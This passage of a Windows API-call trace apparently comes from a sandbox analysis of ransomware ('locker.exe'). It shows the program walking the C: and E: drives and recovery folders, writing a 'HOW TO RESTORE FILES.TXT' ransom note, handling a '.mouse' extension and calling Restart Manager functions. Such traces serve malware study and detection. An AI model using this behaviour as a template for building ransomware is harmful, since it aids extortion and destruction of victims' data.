dwReserved0=0x41c040, dwReserved1=0x81, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="")) returned 1 [0198.356] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.356] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.356] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435470 [0198.356] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0198.356] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0198.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x43ccd8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 30 [0198.356] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.357] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x42be58, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 33 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.357] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc60 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x42bc60, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 33 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.357] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bcd0 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x42bcd0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 33 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.357] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bec8 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=33, lpMultiByteStr=0x42bec8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 33 [0198.357] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bec8 | out: hHeap=0x3c0000) returned 1 [0198.357] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bcd0 | out: hHeap=0x3c0000) returned 1 [0198.357] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc60 | out: hHeap=0x3c0000) returned 1 [0198.357] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.357] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.357] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".MARKER", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0198.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".MARKER", cchWideChar=7, lpMultiByteStr=0x12afc3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".MARKER", lpUsedDefaultChar=0x0) returned 7 [0198.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0198.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\", cchWideChar=3, lpMultiByteStr=0x12afbdc, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\", lpUsedDefaultChar=0x0) returned 3 [0198.358] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0198.358] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0198.358] AreFileApisANSI () returned 1 [0198.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cb20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0198.358] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x3a) returned 0x436ca0 [0198.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cb20, cbMultiByte=-1, lpWideCharStr=0x436ca0, cchWideChar=29 | out: lpWideCharStr="C:\\\\HOW TO RESTORE FILES.TXT") returned 29 [0198.358] GetFileAttributesExW (in: lpFileName="C:\\\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x43cb20, ftLastAccessTime.dwLowDateTime=0x12afa94, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x41f208, nFileSizeHigh=0x70, nFileSizeLow=0x370bb4)) returned 0 [0198.358] GetLastError () returned 0x2 [0198.358] GetLastError () returned 0x2 [0198.358] SetLastError (dwErrCode=0x2) [0198.358] GetLastError () returned 0x2 [0198.358] SetLastError (dwErrCode=0x2) [0198.358] GetLastError () returned 0x2 [0198.358] SetLastError (dwErrCode=0x2) [0198.358] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.358] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ce8 [0198.359] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419dd8 [0198.359] AreFileApisANSI () returned 1 [0198.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cd00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0198.359] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x3a) returned 0x436ca0 [0198.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cd00, cbMultiByte=-1, lpWideCharStr=0x436ca0, cchWideChar=29 | out: lpWideCharStr="C:\\\\HOW TO RESTORE FILES.TXT") returned 29 [0198.359] CreateFileW (lpFileName="C:\\\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\how to restore files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12af930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0198.361] GetFileType (hFile=0x550) returned 0x1 [0198.361] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x4425f8 [0198.362] GetLastError () returned 0x0 [0198.362] SetLastError (dwErrCode=0x0) [0198.362] WriteFile (in: hFile=0x550, lpBuffer=0x12ae5c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x12ae5b8, lpOverlapped=0x0 | out: lpBuffer=0x12ae5c0*, lpNumberOfBytesWritten=0x12ae5b8*=0x71, lpOverlapped=0x0) returned 1 [0198.363] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4425f8 | out: hHeap=0x3c0000) returned 1 [0198.363] CloseHandle (hObject=0x550) returned 1 [0198.364] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419dd8 | out: hHeap=0x3c0000) returned 1 [0198.364] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ce8 | out: hHeap=0x3c0000) returned 1 [0198.365] GetFileAttributesExW (in: lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.366] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x550 [0198.366] GetFileSize (in: hFile=0x550, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0198.366] CloseHandle (hObject=0x550) returned 1 [0198.366] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.366] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.366] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.366] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.366] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x3f28f8 [0198.366] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x3f28f8, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.366] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f28f8 | out: hHeap=0x3c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.366] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x550 [0198.367] GetFileSize (in: hFile=0x550, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0198.367] CloseHandle (hObject=0x550) returned 1 [0198.367] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.367] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4353c0 [0198.367] RmStartSession () returned 0x0 [0198.379] RmRegisterResources () returned 0x0 [0198.423] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x29c) returned 0x43f320 [0198.423] RmGetList () Thread: id = 205 os_tid = 0x428 [0197.626] GetLastError () returned 0x0 [0197.626] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x3f50d8 [0197.626] SetLastError (dwErrCode=0x0) [0197.626] GetCurrentThreadId () returned 0x428 [0197.626] GetCurrentThreadId () returned 0x428 [0197.626] RtlWakeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.658] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1c) returned 0x43caa8 [0197.658] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d4d8 [0197.658] RtlInitializeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.658] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42bd08 [0197.658] RtlInitializeConditionVariable (in: ConditionVariable=0x42bd10 | out: ConditionVariable=0x42bd10) [0197.658] GetCurrentThreadId () returned 0x428 [0197.658] GetCurrentThreadId () returned 0x428 [0197.658] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438a38 [0197.658] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438a44 | out: phModule=0x438a44*=0x320000) returned 1 [0197.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438a38, dwCreationFlags=0x0, lpThreadId=0x316f974 | out: lpThreadId=0x316f974*=0xeb8) returned 0x5b0 [0197.659] SleepConditionVariableSRW (in: ConditionVariable=0x43d4dc, SRWLock=0x42bd10, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d4dc, SRWLock=0x42bd10) returned 1 [0197.739] GetCurrentThreadId () returned 0x428 [0197.739] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd08 | out: hHeap=0x3c0000) returned 1 [0197.739] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d4d8 | out: hHeap=0x3c0000) returned 1 [0197.739] CloseHandle (hObject=0x5b0) returned 1 [0197.739] InitOnceExecuteOnce (in: InitOnce=0x38c9d0, InitFn=0x322847, Parameter=0x38c9d4, Context=0x0 | out: InitOnce=0x38c9d0, Parameter=0x38c9d4, Context=0x0) returned 1 [0197.739] GetLastError () returned 0x0 [0197.739] SetLastError (dwErrCode=0x0) [0197.739] AreFileApisANSI () returned 1 [0197.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x316fa3c, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0197.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x316fa3c, cbMultiByte=3, lpWideCharStr=0x316f914, cchWideChar=3 | out: lpWideCharStr="E:\\") returned 3 [0197.739] FindFirstFileExW (in: lpFileName="E:\\*", fInfoLevelId=0x1, lpFindFileData=0x316f564, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x316f564) returned 0x432bf8 [0197.740] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x68) returned 0x41f268 [0197.740] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.740] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0197.740] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.740] InitOnceExecuteOnce (in: InitOnce=0x38c9d0, InitFn=0x322847, Parameter=0x38c9d4, Context=0x0 | out: InitOnce=0x38c9d0, Parameter=0x38c9d4, Context=0x0) returned 1 [0197.740] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0197.740] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="Recovery", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="Recovery", cchWideChar=8, lpMultiByteStr=0x316f9f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Recovery", lpUsedDefaultChar=0x0) returned 8 [0197.740] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x316f9e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery", lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x316f95c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery", lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x316f944, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery", lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery", cchWideChar=11, lpMultiByteStr=0x316f8fc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery", lpUsedDefaultChar=0x0) returned 11 [0197.741] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x4) returned 0x419df8 [0197.741] FindFirstFileExW (in: lpFileName="E:\\Recovery\\*", fInfoLevelId=0x1, lpFindFileData=0x316f5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x316f5ac) returned 0x4329f8 [0197.741] FindNextFileW (in: hFindFile=0x4329f8, lpFindFileData=0x316f5ac | out: lpFindFileData=0x316f5ac*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x21f97274, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="..", cAlternateFileName="")) returned 1 [0197.741] FindNextFileW (in: hFindFile=0x4329f8, lpFindFileData=0x316f5ac | out: lpFindFileData=0x316f5ac*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="WindowsRE", cAlternateFileName="")) returned 1 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b8e0 [0197.741] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccd8 | out: hHeap=0x3c0000) returned 1 [0197.741] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc60 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbe8 [0197.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="WindowsRE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0197.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="WindowsRE", cchWideChar=9, lpMultiByteStr=0x316f9f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsRE", lpUsedDefaultChar=0x0) returned 9 [0197.741] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbe8 | out: hHeap=0x3c0000) returned 1 [0197.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb48 [0197.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x43cb48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery\\WindowsRE", lpUsedDefaultChar=0x0) returned 21 [0197.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.741] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbe8 [0197.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x43cbe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery\\WindowsRE", lpUsedDefaultChar=0x0) returned 21 [0197.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.742] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc88 [0197.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x43cc88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery\\WindowsRE", lpUsedDefaultChar=0x0) returned 21 [0197.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.742] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\Recovery\\WindowsRE", cchWideChar=21, lpMultiByteStr=0x43cb20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\Recovery\\WindowsRE", lpUsedDefaultChar=0x0) returned 21 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc88 | out: hHeap=0x3c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbe8 | out: hHeap=0x3c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb48 | out: hHeap=0x3c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc60 | out: hHeap=0x3c0000) returned 1 [0197.742] FindNextFileW (in: 